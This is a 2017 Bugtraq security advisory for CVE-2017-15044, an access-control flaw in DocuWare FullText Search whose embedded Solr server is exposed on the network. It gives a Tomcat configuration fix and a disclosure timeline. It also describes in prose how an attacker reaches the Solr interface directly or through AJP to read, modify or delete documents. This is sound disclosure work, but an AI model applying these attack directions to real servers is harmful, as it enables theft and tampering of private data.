lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <F55CBB11-EB09-43C1-A6C3-7F77F3D06379@sharp.fm>
Date: Mon, 20 Nov 2017 10:37:02 +0200
From: Graham Leggett <minfrin@...rp.fm>
To: bugtraq@...urityfocus.com
Subject: [CVE-2017-15044] DocuWare FullText Search - Incorrect Access Control
 vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256



CVE-2017-15044: DocuWare FullText Search - Incorrect Access Control vulnerability

Severity: High

- ------------------------------------------

Vendor:

DocuWare Europe GmbH
Therese-Giehse-Platz 2 82110 Germering Germany

- ------------------------------------------

Description:

The default installation of DocuWare FullText Search server allows remote
users to connect to and download and or modify all searchable text from
the embedded Solr service, bypassing DocuWare's access control features of
the DocuWare user interfaces and API. The vulnerability can be exploited
remotely, and allows both escalation of priviledges and information
disclosure.

- ------------------------------------------

Additional Information:

Based on the manual at http://help.docuware.com/en/#b57870t49903n78031 the
default behaviour of DocuWare is as follows:

"This shows the URL and the address of the Tomcat server that you are
using for the full text in DocuWare. The URL of the connection set up
by the system by default is "http://<hostname<:9013"."

This default behaviour binds the embedded Solr server to the external
network interface of the machine, and exposes all data to any HTTP client
able to connect without access control or data security.

While the manual makes reference to port 9013, the vulnerability was
discovered in a server bound to port 9012 instead.

- ------------------------------------------

Mitigation:

To mitigate the issue, modify the server.xml file in the embedded Tomcat
server that hosts Docuware Fulltext Search, and add address="localhost"
to the container entries as follows:

- --- server.xml-orig	2017-11-19 22:33:55.049241032 +0200
+++ server.xml	2017-11-19 22:33:19.307923621 +0200
@@ -66,7 +66,7 @@
          APR (HTTP/AJP) Connector: /docs/apr.html
          Define a non-SSL HTTP/1.1 Connector on port 8080
     -->
- -    <Connector port="9012" protocol="HTTP/1.1"
+    <Connector port="9012" address="localhost" protocol="HTTP/1.1"
                connectionTimeout="20000"
                redirectPort="8443" />
     <!-- A "Connector" using the shared thread pool-->
@@ -88,7 +88,7 @@
     -->
 
     <!-- Define an AJP 1.3 Connector on port 8009 -->
- -    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
+    <Connector port="8009" address="localhost" protocol="AJP/1.3" redirectPort="8443" />
 
 
     <!-- An Engine represents the entry point (within Catalina) that processes

For more complex deployments where limiting the client to localhost is
not an option, see the Apache Tomcat manual on valve configuration as follows:

https://tomcat.apache.org/tomcat-8.0-doc/config/valve.html#Access_Control

While placing the Docuware FullText Search Server behind a firewall may have offered
some mitigation against this vulnerability, care must be taken to ensure that:

- - The firewall blocked ports 9012/9013 and 8009;
- - From the internet; and
- - From users inside a corporate or internal network; and
- - From other server machines, routers and any other devices that share the
same network as Docuware Fulltext Search.

It is prudent to assume that a typical firewall installation does not follow
all of the requirements above, and to assume that all installations are
therefore potentially vulnerable.

- ------------------------------------------

Vulnerability Type:

Incorrect Access Control.

- ------------------------------------------

Affected Product Code Base
DocuWare - 6.9

Appears to affect all versions in v6.x, including the most recent 6.11.

- ------------------------------------------

Affected Component:

DocuWare FullText Search

- ------------------------------------------

Attack Vectors:

To exploit the vulnerability, the attacker needs to point a web
browser at the embedded DocuWare Fulltext Search server Solr application on
the exposed port (9012/9013) and path (/solrt).

ALternatively, port 8009 exposes the same service via the AJP protocol.
Configure a reverse proxy to translate AJP into HTTP and use a web browser
to view the data as described above.

The full contents of the Docuware FullText Search server can be browsed,
downloaded, modified or deleted using the Solr administration interface.

- ------------------------------------------

References:

https://www.docuware.com/document-management-products-and-services/docuware-premises
http://help.docuware.com/en/#b57870t49903n78031

- ------------------------------------------

Disclosure Timeline:

2017-09-30: Vendor disclosure.
2017-10-05: CVE issued.
2017-10-24: Vendor acknowledgement of the security hole with Docuware internal bug
number 203945, but no commitment for a fix: "Therefore we can’t specify any
date or timeframe on which you can expect the problem to be fixed I’m
afraid."
2017-10-25: Request for an arrangement for coordinated disclosure, request
escalated internally, however request ignored.
2017-11-03: Second request for an arrangement for coordinated disclosure,
request escalated internally again, however request ignored again.
2017-11-20: Full disclosure with details of mitigation.

- ------------------------------------------

Discoverer:

Graham Leggett <minfrin sharp fm>


-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2
Comment: GPGTools - http://gpgtools.org

iQIcBAEBCAAGBQJaEpNIAAoJENOxP8os5gvtwtUP/1FCGjF/eqOg4RjC1fUs02R9
ecp6QIBtSV84MI+75HEa37rRL+OXYZ8PoEHagPI18EB7zPel5xCY04txbaBMCD5K
PrEqh3Vi/iaCnPqyu5EmnjuNqzommJdG5Lbwb84kuxNUown1sn0ixBBfoPzwMXHP
ud4UzXk6QlxOWIJ6XLtc3SlWvq/8hUsIg0KOdBY0ny8zgoLVrlaF2Tis5oCh7O+w
Hd7qmkGzbm3h7KVv3oFTFZIcrojXJtH20ciWTnoh5j693hUW7fJqPxzjfFcW9z6G
uK0iFEBF8SzJ/rOj7k5SURbyBmwJ2FWWKhc0odJl3P0fUphkk8WtgRc5k8cqFYdT
8p1y5FT9385knuWEDJrDuBoaBFGliEH/rzXNJXq8pBHZVmXNxtyqNo/kW/LFKJrc
NAOl4TDdbURGThQWE7aZDLlzmau6twoi65/UrUkDrA+kW7zjcRsvwYz7KZmPFhoI
a0D9KpLlJ56RKvczpc6ZOGBVgfQTkFS2mwQdgRPAX0AwT2sMiIYd6Fe7HRAs3Nij
0dmd1ip3/Ds/DA1p2R8ixdp2ZJxpkR0VXJ9x6Vcz/vl0M9uHlwWtL0owf9Ppg89x
38G/tJU3vja/o9h5wiVR6aFei0ixEQZVf/Q9g+Qwuko4RpG02E26GYW+kwsHpkvj
15Z3rwZoFA//UDX6HzeJ
=eGad
-----END PGP SIGNATURE-----


Download attachment "smime.p7s" of type "application/pkcs7-signature" (3240 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ